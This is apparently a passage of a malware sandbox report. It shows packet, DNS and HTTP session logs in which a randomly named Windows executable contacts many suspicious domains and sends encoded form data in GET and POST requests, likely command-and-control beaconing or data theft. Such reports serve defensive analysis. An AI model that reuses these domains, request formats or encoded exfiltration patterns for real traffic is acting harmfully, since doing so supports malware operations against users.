Dec 12, 2024 21:38:49.687383890 CET  80           49721      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:49.687414885 CET  80           49721      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:49.687458038 CET  49721        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:49.687506914 CET  49721        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:49.762780905 CET  80           49721      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:49.762831926 CET  49721        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:50.647145987 CET  49722        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:50.767117023 CET  80           49722      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:50.767225981 CET  49722        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:50.776324034 CET  49722        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:50.896343946 CET  80           49722      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:52.356918097 CET  80           49722      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:52.357086897 CET  80           49722      18.139.62.226    192.168.2.8
Dec 12, 2024 21:38:52.357197046 CET  49722        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:52.362210035 CET  49722        80         192.168.2.8      18.139.62.226
Dec 12, 2024 21:38:52.482420921 CET  80           49722      18.139.62.226    192.168.2.8
Dec 12, 2024 21:39:06.045407057 CET  49723        80         192.168.2.8      209.74.77.107
Dec 12, 2024 21:39:06.166357994 CET  80           49723      209.74.77.107    192.168.2.8
Dec 12, 2024 21:39:06.166508913 CET  49723        80         192.168.2.8      209.74.77.107
Dec 12, 2024 21:39:06.182305098 CET  49723        80         192.168.2.8      209.74.77.107
Dec 12, 2024 21:39:06.302587986 CET  80           49723      209.74.77.107    192.168.2.8
Dec 12, 2024 21:39:07.390558004 CET  80           49723      209.74.77.107    192.168.2.8
Dec 12, 2024 21:39:07.390573978 CET  80           49723      209.74.77.107    192.168.2.8
Dec 12, 2024 21:39:07.390753984 CET  49723        80         192.168.2.8      209.74.77.107
Dec 12, 2024 21:39:07.690902948 CET  49723        80         192.168.2.8      209.74.77.107
                                                                  Dec 12, 2024 21:39:08.709920883 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.830482960 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:08.830760002 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.845956087 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:08.968632936 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:10.051693916 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:10.051911116 CET8049724209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:10.051964998 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:10.347093105 CET4972480192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.365843058 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.485641003 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:11.485740900 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.500159979 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:11.619911909 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:11.619962931 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:12.784013033 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:12.784102917 CET8049725209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:12.784153938 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:13.004282951 CET4972580192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.021894932 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.141761065 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:14.141882896 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.150553942 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:14.270266056 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:15.387685061 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:15.387711048 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:15.387860060 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:15.391508102 CET4972680192.168.2.8209.74.77.107
                                                                  Dec 12, 2024 21:39:15.511440992 CET8049726209.74.77.107192.168.2.8
                                                                  Dec 12, 2024 21:39:21.067605972 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:21.187483072 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:21.187581062 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:21.202306032 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:21.322148085 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.706759930 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:22.821970940 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.821994066 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.822042942 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:22.822089911 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:22.826731920 CET8049727154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:22.826790094 CET4972780192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.727250099 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.847045898 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:23.847418070 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.862206936 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:23.982131958 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.378329992 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:25.493190050 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.493288994 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.493294954 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:25.493339062 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:25.498476028 CET8049728154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:25.499908924 CET4972880192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.397162914 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.517057896 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:26.519706011 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.534866095 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:26.654772043 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:26.654788017 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:28.050477982 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:28.171380043 CET8049729154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:28.171564102 CET4972980192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.069993019 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.190129042 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:29.190213919 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.202048063 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:29.322118044 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:30.889329910 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:30.889410019 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:30.889518023 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:30.893296957 CET4973080192.168.2.8154.205.159.116
                                                                  Dec 12, 2024 21:39:31.013088942 CET8049730154.205.159.116192.168.2.8
                                                                  Dec 12, 2024 21:39:36.410422087 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:36.530265093 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:36.530386925 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:36.545583010 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:36.665420055 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:37.625699997 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:37.625772953 CET80497313.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:37.625828981 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:38.050250053 CET4973180192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.068898916 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.188808918 CET80497323.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:39.188904047 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.208513975 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:39.328284979 CET80497323.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:40.722439051 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:40.842690945 CET80497323.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:40.845046043 CET4973280192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:41.751569986 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:41.871711016 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:41.871855974 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:41.898597956 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:42.018532038 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.018567085 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.967243910 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.967418909 CET80497333.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:42.967530966 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:43.409624100 CET4973380192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.428863049 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.548918962 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:44.549067974 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.560446978 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:44.680367947 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:45.713291883 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:45.713412046 CET80497343.33.130.190192.168.2.8
                                                                  Dec 12, 2024 21:39:45.713531971 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:45.716208935 CET4973480192.168.2.83.33.130.190
                                                                  Dec 12, 2024 21:39:45.836061954 CET80497343.33.130.190192.168.2.8
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 12, 2024 21:38:08.423593998 CET  51372        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:38:09.035815954 CET  53           51372      1.1.1.1      192.168.2.8
Dec 12, 2024 21:38:25.522785902 CET  61700        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:38:26.518989086 CET  61700        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:38:26.615339041 CET  53           61700      1.1.1.1      192.168.2.8
Dec 12, 2024 21:38:26.656785965 CET  53           61700      1.1.1.1      192.168.2.8
Dec 12, 2024 21:38:41.381788015 CET  64657        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:38:42.394042969 CET  64657        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:38:42.519774914 CET  53           64657      1.1.1.1      192.168.2.8
Dec 12, 2024 21:38:42.531562090 CET  53           64657      1.1.1.1      192.168.2.8
Dec 12, 2024 21:38:57.366195917 CET  58626        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:38:57.588110924 CET  53           58626      1.1.1.1      192.168.2.8
Dec 12, 2024 21:39:05.647577047 CET  54419        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:39:06.042658091 CET  53           54419      1.1.1.1      192.168.2.8
Dec 12, 2024 21:39:20.397300005 CET  55502        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:39:21.064862967 CET  53           55502      1.1.1.1      192.168.2.8
Dec 12, 2024 21:39:35.899326086 CET  55571        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:39:36.407892942 CET  53           55571      1.1.1.1      192.168.2.8
Dec 12, 2024 21:39:50.726933956 CET  59843        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:39:51.738131046 CET  59843        53         192.168.2.8  1.1.1.1
Dec 12, 2024 21:39:52.224288940 CET  53           59843      1.1.1.1      192.168.2.8
Dec 12, 2024 21:39:52.224373102 CET  53           59843      1.1.1.1      192.168.2.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                      Type            Class        DNS over HTTPS
Dec 12, 2024 21:38:08.423593998 CET  192.168.2.8  1.1.1.1  0xdee3    Standard query (0)  www.070001325.xyz         A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:38:25.522785902 CET  192.168.2.8  1.1.1.1  0x6e65    Standard query (0)  www.expancz.top           A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:38:26.518989086 CET  192.168.2.8  1.1.1.1  0x6e65    Standard query (0)  www.expancz.top           A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:38:41.381788015 CET  192.168.2.8  1.1.1.1  0xf750    Standard query (0)  www.taxiquynhonnew.click  A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:38:42.394042969 CET  192.168.2.8  1.1.1.1  0xf750    Standard query (0)  www.taxiquynhonnew.click  A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:38:57.366195917 CET  192.168.2.8  1.1.1.1  0x2046    Standard query (0)  www.epitomize.shop        A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:39:05.647577047 CET  192.168.2.8  1.1.1.1  0xc5b     Standard query (0)  www.learnwithus.site      A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:39:20.397300005 CET  192.168.2.8  1.1.1.1  0x7da1    Standard query (0)  www.jijievo.site          A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:39:35.899326086 CET  192.168.2.8  1.1.1.1  0x268     Standard query (0)  www.likesharecomment.net  A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:39:50.726933956 CET  192.168.2.8  1.1.1.1  0xfe90    Standard query (0)  www.397256.pink           A (IP address)  IN (0x0001)  false
Dec 12, 2024 21:39:51.738131046 CET  192.168.2.8  1.1.1.1  0xfe90    Standard query (0)  www.397256.pink           A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                      CName                 Address          Type                    Class        DNS over HTTPS
Dec 12, 2024 21:38:09.035815954 CET  1.1.1.1    192.168.2.8  0xdee3    No error (0)    www.070001325.xyz         -                     161.97.142.144   A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:26.615339041 CET  1.1.1.1    192.168.2.8  0x6e65    No error (0)    www.expancz.top           -                     107.155.56.30    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:26.656785965 CET  1.1.1.1    192.168.2.8  0x6e65    No error (0)    www.expancz.top           -                     107.155.56.30    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:42.519774914 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    www.taxiquynhonnew.click  dns.ladipage.com      -                CNAME (Canonical name)  IN (0x0001)  false
Dec 12, 2024 21:38:42.519774914 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    dns.ladipage.com          -                     18.139.62.226    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:42.519774914 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    dns.ladipage.com          -                     13.228.81.39     A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:42.519774914 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    dns.ladipage.com          -                     54.179.173.60    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:42.531562090 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    www.taxiquynhonnew.click  dns.ladipage.com      -                CNAME (Canonical name)  IN (0x0001)  false
Dec 12, 2024 21:38:42.531562090 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    dns.ladipage.com          -                     54.179.173.60    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:42.531562090 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    dns.ladipage.com          -                     18.139.62.226    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:42.531562090 CET  1.1.1.1    192.168.2.8  0xf750    No error (0)    dns.ladipage.com          -                     13.228.81.39     A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:38:57.588110924 CET  1.1.1.1    192.168.2.8  0x2046    Name error (3)  www.epitomize.shop        none                  none             A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:06.042658091 CET  1.1.1.1    192.168.2.8  0xc5b     No error (0)    www.learnwithus.site      -                     209.74.77.107    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    www.jijievo.site          all.wjscdn.com        -                CNAME (Canonical name)  IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    all.wjscdn.com            -                     154.205.159.116  A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    all.wjscdn.com            -                     38.54.112.227    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    all.wjscdn.com            -                     154.90.35.240    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    all.wjscdn.com            -                     154.90.58.209    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    all.wjscdn.com            -                     154.205.143.51   A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:21.064862967 CET  1.1.1.1    192.168.2.8  0x7da1    No error (0)    all.wjscdn.com            -                     154.205.156.26   A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:36.407892942 CET  1.1.1.1    192.168.2.8  0x268     No error (0)    www.likesharecomment.net  likesharecomment.net  -                CNAME (Canonical name)  IN (0x0001)  false
Dec 12, 2024 21:39:36.407892942 CET  1.1.1.1    192.168.2.8  0x268     No error (0)    likesharecomment.net      -                     3.33.130.190     A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:36.407892942 CET  1.1.1.1    192.168.2.8  0x268     No error (0)    likesharecomment.net      -                     15.197.148.33    A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:52.224288940 CET  1.1.1.1    192.168.2.8  0xfe90    No error (0)    www.397256.pink           -                     38.46.13.54      A (IP address)          IN (0x0001)  false
Dec 12, 2024 21:39:52.224373102 CET  1.1.1.1    192.168.2.8  0xfe90    No error (0)    www.397256.pink           -                     38.46.13.54      A (IP address)          IN (0x0001)  false
                                                                  • www.070001325.xyz
                                                                  • www.expancz.top
                                                                  • www.taxiquynhonnew.click
                                                                  • www.learnwithus.site
                                                                  • www.jijievo.site
                                                                  • www.likesharecomment.net
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.8  49714        161.97.142.144  80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe

Timestamp                            Bytes transferred  Direction  Data
Dec 12, 2024 21:38:09.183099031 CET  562                OUT        GET /gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.070001325.xyz
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 12, 2024 21:38:10.418154001 CET  1236               IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 12 Dec 2024 20:38:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                  Dec 12, 2024 21:38:10.418684006 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                  Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                  Dec 12, 2024 21:38:10.418700933 CET  698                IN
                                                                  Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  1           192.168.2.8  49715        107.155.56.30   80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Dec 12, 2024 21:38:26.753129005 CET  810                OUT        POST /2gcl/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.expancz.top
                                                                  Origin: http://www.expancz.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.expancz.top/2gcl/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Ascii: 84EhVDY=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSS5dcwm1gKZY+55Vn7TGwjnes+geUC1tgvUoDT0=
                                                                  Dec 12, 2024 21:38:28.317806005 CET  697                IN         HTTP/1.1 405 Not Allowed
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:28 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 552
                                                                  Connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  2           192.168.2.8  49716        107.155.56.30   80                5240  C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                  Dec 12, 2024 21:38:29.424287081 CET  830                OUT        POST /2gcl/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.expancz.top
                                                                  Origin: http://www.expancz.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.expancz.top/2gcl/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Ascii: 84EhVDY=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjP1s9IoR1oF6MEYdEhA81YCVUhSiLz8bG2dnqjK
                                                                  Dec 12, 2024 21:38:30.990894079 CET  697                IN         HTTP/1.1 405 Not Allowed
                                                                  Server: nginx
                                                                  Date: Thu, 12 Dec 2024 20:38:30 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 552
                                                                  Connection: close
